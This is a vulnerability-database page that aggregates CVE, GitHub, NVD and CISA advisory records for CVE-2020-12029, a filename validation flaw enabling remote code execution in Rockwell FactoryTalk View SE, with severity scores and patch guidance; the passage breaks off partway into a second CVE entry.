CVE-2020-12029

Vulnerability from cvelistv5

Published

2020-07-20 14:56

Modified

2024-09-16 22:02

Severity ?

9.0 (Critical) - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

Summary

References

URL	Tags
ics-cert@hq.dhs.gov	http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html	Exploit, Third Party Advisory, VDB Entry
ics-cert@hq.dhs.gov	https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944	Vendor Advisory
ics-cert@hq.dhs.gov	https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05	Third Party Advisory, US Government Resource
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05	Third Party Advisory, US Government Resource

Impacted products

	Vendor	Product	Version
	Rockwell Automation	FactoryTalk View SE	Version: all versions

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T11:48:57.742Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "FactoryTalk View SE",
          "vendor": "Rockwell Automation",
          "versions": [
            {
              "status": "affected",
              "version": "all versions"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Trend Micro\u2019s Zero Day Initiative reported these vulnerabilities to Rockwell Automation"
        }
      ],
      "datePublic": "2020-06-18T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "All versions of FactoryTalk View SE do not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE). Rockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 \u2013 Patch Roll-up for CPR9 SRx."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "NONE",
            "baseScore": 9,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-20",
              "description": "IMPROPER INPUT VALIDATION CWE-20",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-11-20T17:06:19",
        "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
        "shortName": "icscert"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Rockwell Automation has released new versions of the affected products to mitigate the reported vulnerabilities. Affected users who are not able to apply the latest update are encouraged to seek additional mitigations or workarounds from the vendor\u2019s published guidelines in their security advisory.\nRockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 \u2013 Patch Roll-up for CPR9 SRx."
        }
      ],
      "source": {
        "advisory": "ICSA-20-170-05 Rockwell Automation FactoryTalk View SE",
        "discovery": "EXTERNAL"
      },
      "title": "Rockwell Automation FactoryTalk View SE",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "ics-cert@hq.dhs.gov",
          "DATE_PUBLIC": "2020-06-18T00:00:00.000Z",
          "ID": "CVE-2020-12029",
          "STATE": "PUBLIC",
          "TITLE": "Rockwell Automation FactoryTalk View SE"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "FactoryTalk View SE",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "=",
                            "version_value": "all versions"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Rockwell Automation"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Trend Micro\u2019s Zero Day Initiative reported these vulnerabilities to Rockwell Automation"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "All versions of FactoryTalk View SE do not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE). Rockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 \u2013 Patch Roll-up for CPR9 SRx."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "NONE",
            "baseScore": 9,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "IMPROPER INPUT VALIDATION CWE-20"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05",
              "refsource": "MISC",
              "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05"
            },
            {
              "name": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944",
              "refsource": "MISC",
              "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
            },
            {
              "name": "http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Rockwell Automation has released new versions of the affected products to mitigate the reported vulnerabilities. Affected users who are not able to apply the latest update are encouraged to seek additional mitigations or workarounds from the vendor\u2019s published guidelines in their security advisory.\nRockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 \u2013 Patch Roll-up for CPR9 SRx."
          }
        ],
        "source": {
          "advisory": "ICSA-20-170-05 Rockwell Automation FactoryTalk View SE",
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
    "assignerShortName": "icscert",
    "cveId": "CVE-2020-12029",
    "datePublished": "2020-07-20T14:56:42.195322Z",
    "dateReserved": "2020-04-21T00:00:00",
    "dateUpdated": "2024-09-16T22:02:56.282Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2020-12029\",\"sourceIdentifier\":\"ics-cert@hq.dhs.gov\",\"published\":\"2020-07-20T15:15:11.477\",\"lastModified\":\"2024-11-21T04:59:08.690\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"All versions of FactoryTalk View SE do not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE). Rockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 \u2013 Patch Roll-up for CPR9 SRx.\"},{\"lang\":\"es\",\"value\":\"Todas las versiones de FactoryTalk View SE no comprueban apropiadamente una entrada de nombres de archivo dentro de un directorio de proyecto. Un atacante remoto no autenticado puede ejecutar un archivo dise\u00f1ado en un endpoint remoto que puede resultar en una ejecuci\u00f3n de c\u00f3digo remota (RCE). Rockwell Automation recomienda aplicar el parche 1126289. Antes de instalar este parche, el paquete acumulativo con fecha del 06 de abril de 2020 o posterior DEBE ser aplicado. 1066644 - Parche Roll-up para CPR9 SRx\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"ics-cert@hq.dhs.gov\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N\",\"baseScore\":9.0,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.5,\"impactScore\":5.8},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:M/Au:N/C:P/I:P/A:P\",\"baseScore\":6.8,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"MEDIUM\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":8.6,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":true}]},\"weaknesses\":[{\"source\":\"ics-cert@hq.dhs.gov\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rockwellautomation:factorytalk_view:-:*:*:*:se:*:*:*\",\"matchCriteriaId\":\"64A0FD00-8655-4429-8915-732AA4925C07\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html\",\"source\":\"ics-cert@hq.dhs.gov\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944\",\"source\":\"ics-cert@hq.dhs.gov\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05\",\"source\":\"ics-cert@hq.dhs.gov\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]},{\"url\":\"http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]}]}}"
  }
}

ghsa-v98p-v8hm-3f7c

Vulnerability from github

Published

2022-05-24 22:28

Modified

2022-05-24 22:28

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2020-12029"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-07-20T15:15:00Z",
    "severity": "MODERATE"
  },
  "details": "All versions of FactoryTalk View SE do not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE). Rockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 \u2013 Patch Roll-up for CPR9 SRx.",
  "id": "GHSA-v98p-v8hm-3f7c",
  "modified": "2022-05-24T22:28:58Z",
  "published": "2022-05-24T22:28:58Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12029"
    },
    {
      "type": "WEB",
      "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
    },
    {
      "type": "WEB",
      "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

fkie_cve-2020-12029

Vulnerability from fkie_nvd

Published

2020-07-20 15:15

Modified

2024-11-21 04:59

Severity ?

9.0 (Critical) - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
ics-cert@hq.dhs.gov	http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html	Exploit, Third Party Advisory, VDB Entry
ics-cert@hq.dhs.gov	https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944	Vendor Advisory
ics-cert@hq.dhs.gov	https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05	Third Party Advisory, US Government Resource
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05	Third Party Advisory, US Government Resource

Impacted products

	Vendor	Product	Version
	rockwellautomation	factorytalk_view	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:rockwellautomation:factorytalk_view:-:*:*:*:se:*:*:*",
              "matchCriteriaId": "64A0FD00-8655-4429-8915-732AA4925C07",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "All versions of FactoryTalk View SE do not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE). Rockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 \u2013 Patch Roll-up for CPR9 SRx."
    },
    {
      "lang": "es",
      "value": "Todas las versiones de FactoryTalk View SE no comprueban apropiadamente una entrada de nombres de archivo dentro de un directorio de proyecto. Un atacante remoto no autenticado puede ejecutar un archivo dise\u00f1ado en un endpoint remoto que puede resultar en una ejecuci\u00f3n de c\u00f3digo remota (RCE). Rockwell Automation recomienda aplicar el parche 1126289. Antes de instalar este parche, el paquete acumulativo con fecha del 06 de abril de 2020 o posterior DEBE ser aplicado. 1066644 - Parche Roll-up para CPR9 SRx"
    }
  ],
  "id": "CVE-2020-12029",
  "lastModified": "2024-11-21T04:59:08.690",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.8,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "NONE",
          "baseScore": 9.0,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.5,
        "impactScore": 5.8,
        "source": "ics-cert@hq.dhs.gov",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 7.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-07-20T15:15:11.477",
  "references": [
    {
      "source": "ics-cert@hq.dhs.gov",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html"
    },
    {
      "source": "ics-cert@hq.dhs.gov",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
    },
    {
      "source": "ics-cert@hq.dhs.gov",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05"
    }
  ],
  "sourceIdentifier": "ics-cert@hq.dhs.gov",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "ics-cert@hq.dhs.gov",
      "type": "Primary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Secondary"
    }
  ]
}

ICSA-20-170-05

Vulnerability from csaf_cisa

Published

2020-06-18 00:00

Modified

2020-06-18 00:00

Summary

Rockwell Automation FactoryTalk View SE

Notes

CISA Disclaimer

This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov

Legal Notice

All information products included in https://us-cert.cisa.gov/ics are provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.

Risk evaluation

Successful exploitation of these vulnerabilities may allow a remote authenticated attacker to manipulate data of affected devices.

Critical infrastructure sectors

Chemical, Commercial Facilities, Critical Manufacturing, Energy, Government Facilities, Water and Wastewater Systems

Countries/areas deployed

Worldwide

Company headquarters location

United States

Recommended Practices

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage onus-cert.gov. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Recommended Practices

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage on us-cert.gov in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.

Recommended Practices

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

Exploitability

No known public exploits specifically target these vulnerabilities.

JSON

To clipboard

{
  "document": {
    "acknowledgments": [
      {
        "organization": "Rockwell Automation",
        "summary": "reporting these vulnerabilities to CISA"
      },
      {
        "organization": "Trend Micro \u0027s Zero Day Initiative",
        "summary": "reporting these vulnerabilities to CISA"
      }
    ],
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Disclosure is not limited",
      "tlp": {
        "label": "WHITE",
        "url": "https://us-cert.cisa.gov/tlp/"
      }
    },
    "lang": "en-US",
    "notes": [
      {
        "category": "general",
        "text": "This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov",
        "title": "CISA Disclaimer"
      },
      {
        "category": "legal_disclaimer",
        "text": "All information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.",
        "title": "Legal Notice"
      },
      {
        "category": "summary",
        "text": "Successful exploitation of these vulnerabilities may allow a remote authenticated attacker to manipulate data of affected devices.",
        "title": "Risk evaluation"
      },
      {
        "category": "other",
        "text": "Chemical, Commercial Facilities, Critical Manufacturing, Energy, Government Facilities, Water and Wastewater Systems",
        "title": "Critical infrastructure sectors"
      },
      {
        "category": "other",
        "text": "Worldwide",
        "title": "Countries/areas deployed"
      },
      {
        "category": "other",
        "text": "United States",
        "title": "Company headquarters location"
      },
      {
        "category": "general",
        "text": "CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\nCISA also provides a section for control systems security recommended practices on the ICS webpage onus-cert.gov. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.",
        "title": "Recommended Practices"
      },
      {
        "category": "general",
        "text": "Additional mitigation guidance and recommended practices are publicly available on the ICS webpage on us-cert.gov in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.",
        "title": "Recommended Practices"
      },
      {
        "category": "general",
        "text": "CISA also recommends users take the following measures to protect themselves from social engineering attacks:",
        "title": "Recommended Practices"
      },
      {
        "category": "other",
        "text": "No known public exploits specifically target these vulnerabilities.",
        "title": "Exploitability"
      }
    ],
    "publisher": {
      "category": "coordinator",
      "contact_details": "Email: CISAservicedesk@cisa.dhs.gov;\n Toll Free: 1-888-282-0870",
      "name": "CISA",
      "namespace": "https://www.cisa.gov/"
    },
    "references": [
      {
        "category": "self",
        "summary": "ICS Advisory ICSA-20-170-05 JSON",
        "url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/OT/white/2020/icsa-20-170-05.json"
      },
      {
        "category": "self",
        "summary": "ICS Advisory ICSA-20-170-05 Web Version",
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-20-170-05"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://www.us-cert.gov/ncas/tips/ST04-014"
      }
    ],
    "title": "Rockwell Automation FactoryTalk View SE",
    "tracking": {
      "current_release_date": "2020-06-18T00:00:00.000000Z",
      "generator": {
        "engine": {
          "name": "CISA CSAF Generator",
          "version": "1.0.0"
        }
      },
      "id": "ICSA-20-170-05",
      "initial_release_date": "2020-06-18T00:00:00.000000Z",
      "revision_history": [
        {
          "date": "2020-06-18T00:00:00.000000Z",
          "legacy_version": "Initial",
          "number": "1",
          "summary": "Publication Date"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "vers:all/*",
                "product": {
                  "name": " FactoryTalk View SE: All versions",
                  "product_id": "CSAFPID-0001"
                }
              }
            ],
            "category": "product_name",
            "name": "FactoryTalk View SE"
          }
        ],
        "category": "vendor",
        "name": "Rockwell Automation"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2020-12029",
      "cwe": {
        "id": "CWE-20",
        "name": "Improper Input Validation"
      },
      "notes": [
        {
          "category": "summary",
          "text": "The affected product does not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE).CVE-2020-12029 has been assigned to this vulnerability. A CVSS v3 base score of 9.0 has been assigned; the CVSS vector string is (AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N).",
          "title": "Vulnerability Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-0001"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "web.nvd.nist.gov",
          "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12029"
        },
        {
          "category": "external",
          "summary": "www.first.org",
          "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N"
        }
      ],
      "remediations": [
        {
          "category": "mitigation",
          "details": "Rockwell Automation has released new versions of the affected products to mitigate the reported vulnerabilities. Affected users who are not able to apply the latest update are encouraged to seek additional mitigations or workarounds from the vendor\u0027s published guidelines in their security advisory.",
          "product_ids": [
            "CSAFPID-0001"
          ],
          "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
        },
        {
          "category": "mitigation",
          "details": "For CVE-2020-12029 Rockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 - Patch Roll-up for CPR9 SRx.",
          "product_ids": [
            "CSAFPID-0001"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 9.0,
            "baseSeverity": "CRITICAL",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
            "version": "3.0"
          },
          "products": [
            "CSAFPID-0001"
          ]
        }
      ]
    },
    {
      "cve": "CVE-2020-12031",
      "cwe": {
        "id": "CWE-119",
        "name": "Improper Restriction of Operations within the Bounds of a Memory Buffer"
      },
      "notes": [
        {
          "category": "summary",
